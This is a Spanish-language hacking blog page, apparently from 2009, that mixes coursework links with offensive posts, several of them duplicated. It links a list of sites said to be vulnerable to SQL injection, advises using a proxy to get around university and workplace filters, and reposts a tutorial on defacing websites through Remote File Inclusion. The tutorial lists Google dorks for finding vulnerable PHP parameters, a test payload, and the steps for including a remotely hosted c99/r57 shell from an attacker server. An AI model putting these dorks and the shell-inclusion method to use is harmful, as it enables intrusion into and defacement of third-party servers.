Bueno esto es un "paquete" de paginas vulnerables a sql injection hecha por zero zoorg
http://www.zer0-z0org.org/2009/04/paginas-mexicanas-vulnerables.html
saludos
PD: El post lo hize para dar a conocer el numero de paginas vulnerables y sobre todo lo importantes que son, sin motivo delictivo solo informativo
Documentos Contexto
Etiquetas:
universidad
0
comentarios
futuro de la ingenieria: que nos depara el futuro como ingenieros??
http://ingenieria.udea.edu.co/producciones/Heberto_t/el_futuro_ingeniero.html
http://www.idg.es/computerworld/articulo.asp?id=155598
http://servicios.laverdad.es/extras/colegios2007/suscr/nec25.htm
http://www.ingenieroseninformatica.org/index.php?option=com_content&task=view&id=102&Itemid=2
http://www.stsc.hill.af.mil/CrossTalk/2008/01/0801DewarSchonberg.html
Cambios en lo cultural
http://www.elperiodista.cl/newtenberg/1895/article-77099.html
http://www.oei.es/salactsi/osorio7.htm
PD:noticias error contexto 2
http://ingenieria.udea.edu.co/producciones/Heberto_t/el_futuro_ingeniero.html
http://www.idg.es/computerworld/articulo.asp?id=155598
http://servicios.laverdad.es/extras/colegios2007/suscr/nec25.htm
http://www.ingenieroseninformatica.org/index.php?option=com_content&task=view&id=102&Itemid=2
http://www.stsc.hill.af.mil/CrossTalk/2008/01/0801DewarSchonberg.html
Cambios en lo cultural
http://www.elperiodista.cl/newtenberg/1895/article-77099.html
http://www.oei.es/salactsi/osorio7.htm
PD:noticias error contexto 2
Herramientas "Fundamentales" en internet
Etiquetas:
fundamentales,
herramientas fundamentales,
web
0
comentarios
Bueno hoy quiero abrir este post mostrando webs fundamentales para nuestra" navegacion" o vida en internet, intentare seguir este post mostrando webs muy importantes en nuestro oficio y mas que todo como trucos de navegacion para x o y motivo.
Los invito a que si conocen mas webs funcamentales para nuestro oficio por favor comunicarlo o complementar este post.
1. Una de las fundamentales paginas que uso en inet es
http://www.2bypass.info/
Se trata de un proxy que nos permite navegar anonimamente , pero yo en realidad no lo uso para eso xD , lo uso para saltarme la seguridad de la U.
Este proxie nos permite navegar en todas las paginas que en nuestra empresa esten bloqueadas , su uso es muy sencillo solo ponemos la pagina donde dice http:// y listo a navegar sin bloqueo alguno.
No hacer esto para molestar al administrador , solo para usos necesarios eso no incluye (facebook, youtube, entre otros xD).
2. La segunda en mi lista es
http://file2hd.com/
Esta web nos permite bajar archivos de una pagina determinada , en realidad en estos momentos lo uso para bajar musica de myspace y videos de youtube xD, pero tambien tiene su lado maligno asi que explorenlo. No exageren con su uso (saben a que me refiero)
3. Por hoy llegamos hasta el tercero y el mas fundamental a la hora de una ataque
http://www.edithex.com/
Ya muchos de los lectores sabra para que es y tambien muchos que han leido sobre desfacing o les ha tocado una pagina maluquita y tediosa xD.
Bueno por hoy dejamos estas tres paginas para pasar el dia , explorenlas al maximo y recuerden siempre por el lado bueno.
saludos roboticos
Los invito a que si conocen mas webs funcamentales para nuestro oficio por favor comunicarlo o complementar este post.
1. Una de las fundamentales paginas que uso en inet es
http://www.2bypass.info/
Se trata de un proxy que nos permite navegar anonimamente , pero yo en realidad no lo uso para eso xD , lo uso para saltarme la seguridad de la U.
Este proxie nos permite navegar en todas las paginas que en nuestra empresa esten bloqueadas , su uso es muy sencillo solo ponemos la pagina donde dice http:// y listo a navegar sin bloqueo alguno.
No hacer esto para molestar al administrador , solo para usos necesarios eso no incluye (facebook, youtube, entre otros xD).
2. La segunda en mi lista es
http://file2hd.com/
Esta web nos permite bajar archivos de una pagina determinada , en realidad en estos momentos lo uso para bajar musica de myspace y videos de youtube xD, pero tambien tiene su lado maligno asi que explorenlo. No exageren con su uso (saben a que me refiero)
3. Por hoy llegamos hasta el tercero y el mas fundamental a la hora de una ataque
http://www.edithex.com/
Ya muchos de los lectores sabra para que es y tambien muchos que han leido sobre desfacing o les ha tocado una pagina maluquita y tediosa xD.
Bueno por hoy dejamos estas tres paginas para pasar el dia , explorenlas al maximo y recuerden siempre por el lado bueno.
saludos roboticos
Tutorial DEFACEAR web con RFI mas informacion del blog
Etiquetas:
desfacing,
rfi
3
comentarios
Buscando en la inet dorks para buscar vulnerabilidades rfi encontre un tuto muy bueno , igual todos en inet son lo mismo , es mas si yo escribiera uno seria lo mismo por eso pienso "Porque hacer algo que ya esta escrito" xD y por eso les traigo este articulo para que entiendan como identificar , buscar y explotar un rfi.
saludos y excelente comunidad muy recomendada
PD:
1. Este tuto fue escrito Por MainFox Para blackportal
2.Proximamente estare realizando un top de las mejores comunidades en cuanto a documentacion propia y proyectos , las catalogare por temas como : desfacing , hackin etico entre otros.
3.Los labs sigen esta semana a mas tardar el viernes termino nemesis y sigo con ettercap
4. las personas que mandaron correos para:
comunidad bad_robot y curso de informatica forense
Por favor volverlo hacer para seguir con el proyecto ya que tengo tiempo libre para empezarlo
Esten atentos para mas informacion
---------------------------------------------------------------------------------------------------
Este tuto lo hizo un colega amigo Dark_eye.
Hay les presento una forma sencilla de defacear una web con RFI.
Primero de nada, habrá que encontrar una, lo puede hacen con dorks de google, o escaneando las webs de un server que seguro que alguna tiene algo mal programado.
Una RFI, que por cierto se llama Remote File Inclusion, se trata de hacer que un script en ASP, PHP, JSP, etc... incluya un fichero externo al servidor. Este archivo incluido suele ser usualmente una Shell, es decir, un archivo que permite controlar el servidor donde se ejecuta.
Pasemos a la practica, los dorks para buscar en google suelen ser como:
allinurl:index.php?page= .php
allinurl: index.php?*=*
allinurl: noticias/index.php?category=
allinurl: index.php?noticias=*
O tambien puedes buscar rutas del estilo pagina.php?lokesea=
"includes/header.php?systempath="
"amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path="
"index.inc.php?PATH_Includes="
"nphp/nphpd.php?nphp_config[LangFile]="
"include/db.php?GLOBALS[rootdp]="
"ashnews.php?pathtoashnews="
"ashheadlines.php?pathtoashnews="
"modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="
"demo/includes/init.php?user_inc="
"jaf/index.php?show="
"inc/shows.inc.php?cutepath="
"poll/admin/common.inc.php?base_path="
"pollvote/pollvote.php?pollname="
"sources/post.php?fil_config="
"modules/My_eGallery/public/displayCategory.php?basepath="
"bb_lib/checkdb.inc.php?libpach="
"include/livre_include.php?no_connect=lol&chem_absolu="
"index.php?from_market=Y&pageurl="
"modules/mod_mainmenu.php?mosConfig_absolute_path="
"pivot/modules/module_db.php?pivot_path="
Bien al meter eso en google, devolverá una serie de paginas, bien para probar si son vulnerables, solo nos queda probarlas.
si la url de la web es http://xxxx.com/index.php?page=partners.php probaremos con
http://xxxx.com/index.php?page=http://google.es
y si la pagina de San Google aparece en alguna parte de la web, felicidades, es vulnerable.
Entonces nos bajamos alguna Shell como c99 o r57 y la subimos con la termiancion .txt a algun servidor publico.
Podemos conseguirla aqui: http://www.milw0rm.us/
luego accedemos a la url: http://xxxx.com/index.php?page=http://tuserver.com/tushell.txt
Entonces modificamos la pagina principal y ponemos algo como "Hacked bY tUnICK"
y tendremos nuestra shell ejecutada en el servidor, lo que viene ya queda a voluntad de cada uno, puedes ser un chico bueno y no tocar nada, o puedes formatear el server con un poco de suerte, rootearlo, pero bueno eso ya no entra en el tema...
Saludos
Fuente:http://bl4ck-p0rtal.mihost.info/foro/index.php?topic=740.0
saludos y excelente comunidad muy recomendada
PD:
1. Este tuto fue escrito Por MainFox Para blackportal
2.Proximamente estare realizando un top de las mejores comunidades en cuanto a documentacion propia y proyectos , las catalogare por temas como : desfacing , hackin etico entre otros.
3.Los labs sigen esta semana a mas tardar el viernes termino nemesis y sigo con ettercap
4. las personas que mandaron correos para:
comunidad bad_robot y curso de informatica forense
Por favor volverlo hacer para seguir con el proyecto ya que tengo tiempo libre para empezarlo
Esten atentos para mas informacion
---------------------------------------------------------------------------------------------------
Este tuto lo hizo un colega amigo Dark_eye.
Hay les presento una forma sencilla de defacear una web con RFI.
Primero de nada, habrá que encontrar una, lo puede hacen con dorks de google, o escaneando las webs de un server que seguro que alguna tiene algo mal programado.
Una RFI, que por cierto se llama Remote File Inclusion, se trata de hacer que un script en ASP, PHP, JSP, etc... incluya un fichero externo al servidor. Este archivo incluido suele ser usualmente una Shell, es decir, un archivo que permite controlar el servidor donde se ejecuta.
Pasemos a la practica, los dorks para buscar en google suelen ser como:
allinurl:index.php?page= .php
allinurl: index.php?*=*
allinurl: noticias/index.php?category=
allinurl: index.php?noticias=*
O tambien puedes buscar rutas del estilo pagina.php?lokesea=
"includes/header.php?systempath="
"amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path="
"index.inc.php?PATH_Includes="
"nphp/nphpd.php?nphp_config[LangFile]="
"include/db.php?GLOBALS[rootdp]="
"ashnews.php?pathtoashnews="
"ashheadlines.php?pathtoashnews="
"modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="
"demo/includes/init.php?user_inc="
"jaf/index.php?show="
"inc/shows.inc.php?cutepath="
"poll/admin/common.inc.php?base_path="
"pollvote/pollvote.php?pollname="
"sources/post.php?fil_config="
"modules/My_eGallery/public/displayCategory.php?basepath="
"bb_lib/checkdb.inc.php?libpach="
"include/livre_include.php?no_connect=lol&chem_absolu="
"index.php?from_market=Y&pageurl="
"modules/mod_mainmenu.php?mosConfig_absolute_path="
"pivot/modules/module_db.php?pivot_path="
Bien al meter eso en google, devolverá una serie de paginas, bien para probar si son vulnerables, solo nos queda probarlas.
si la url de la web es http://xxxx.com/index.php?page=partners.php probaremos con
http://xxxx.com/index.php?page=http://google.es
y si la pagina de San Google aparece en alguna parte de la web, felicidades, es vulnerable.
Entonces nos bajamos alguna Shell como c99 o r57 y la subimos con la termiancion .txt a algun servidor publico.
Podemos conseguirla aqui: http://www.milw0rm.us/
luego accedemos a la url: http://xxxx.com/index.php?page=http://tuserver.com/tushell.txt
Entonces modificamos la pagina principal y ponemos algo como "Hacked bY tUnICK"
y tendremos nuestra shell ejecutada en el servidor, lo que viene ya queda a voluntad de cada uno, puedes ser un chico bueno y no tocar nada, o puedes formatear el server con un poco de suerte, rootearlo, pero bueno eso ya no entra en el tema...
Saludos
Fuente:http://bl4ck-p0rtal.mihost.info/foro/index.php?topic=740.0
invetigacion
Etiquetas:
universidad
0
comentarios
Paradigmas en ingenieria
Desarrollo de software
http://www.mitecnologico.com/Main/ParadigmasDeLaIngenieriaDeSoftware
http://www.wikilearning.com/curso_gratis/metodologias_usadas_en_ingenieria_del_software-paradigmas_de_programacion_y_sus_tipos/3618-3
En el Aspecto Humano
http://www.oei.es/salactsi/osorio7.htm
Aspecto Ambiental
http://www.upm.es/innovacion/cd/09_cyj/documentos/experiencias_innovacion/Mesa_Desarrollo_Nuevas_Tecnologias_Aprendizaje-Evaluacion-Desarrollo_Curricular/7feb/nuevos_fernando_gutierrez.pdf
El secreto la pelicula
http://www.youtube.com/watch?v=ssFytUAtLp8&feature=related ==El secreto (1 parte) reflexiones
http://www.youtube.com/watch?v=kHwb0XRZw_w&feature=related ==el secreto (2 parte) reflexiones
http://www.megavideo.com/?v=C6G3ZAU7 --pelicula online
RECURSOS
instalando flash
linux
mozilla http://casidiablo.net/gentoo-instalar-plugin-flash-mozilla/
Windows xp y vista(solo mozilla)
mozilla http://es.kioskea.net/faq/sujet-2617-instalar-adobe-flash-player-en-firefox-bajo-windows
Iexplorer y varios http://www.wilkinsonpc.com.co/free/flash-shockwave-player.html
windows vista
iexplorer http://eugeniowgarcia.blogspot.com/2007/07/instalar-flash-player-sobre-windows.html
Desarrollo de software
http://www.mitecnologico.com/Main/ParadigmasDeLaIngenieriaDeSoftware
http://www.wikilearning.com/curso_gratis/metodologias_usadas_en_ingenieria_del_software-paradigmas_de_programacion_y_sus_tipos/3618-3
En el Aspecto Humano
http://www.oei.es/salactsi/osorio7.htm
Aspecto Ambiental
http://www.upm.es/innovacion/cd/09_cyj/documentos/experiencias_innovacion/Mesa_Desarrollo_Nuevas_Tecnologias_Aprendizaje-Evaluacion-Desarrollo_Curricular/7feb/nuevos_fernando_gutierrez.pdf
El secreto la pelicula
http://www.youtube.com/watch?v=ssFytUAtLp8&feature=related ==El secreto (1 parte) reflexiones
http://www.youtube.com/watch?v=kHwb0XRZw_w&feature=related ==el secreto (2 parte) reflexiones
http://www.megavideo.com/?v=C6G3ZAU7 --pelicula online
RECURSOS
instalando flash
linux
mozilla http://casidiablo.net/gentoo-instalar-plugin-flash-mozilla/
Windows xp y vista(solo mozilla)
mozilla http://es.kioskea.net/faq/sujet-2617-instalar-adobe-flash-player-en-firefox-bajo-windows
Iexplorer y varios http://www.wilkinsonpc.com.co/free/flash-shockwave-player.html
windows vista
iexplorer http://eugeniowgarcia.blogspot.com/2007/07/instalar-flash-player-sobre-windows.html
Suscribirse a:
Entradas (Atom)
Entradas
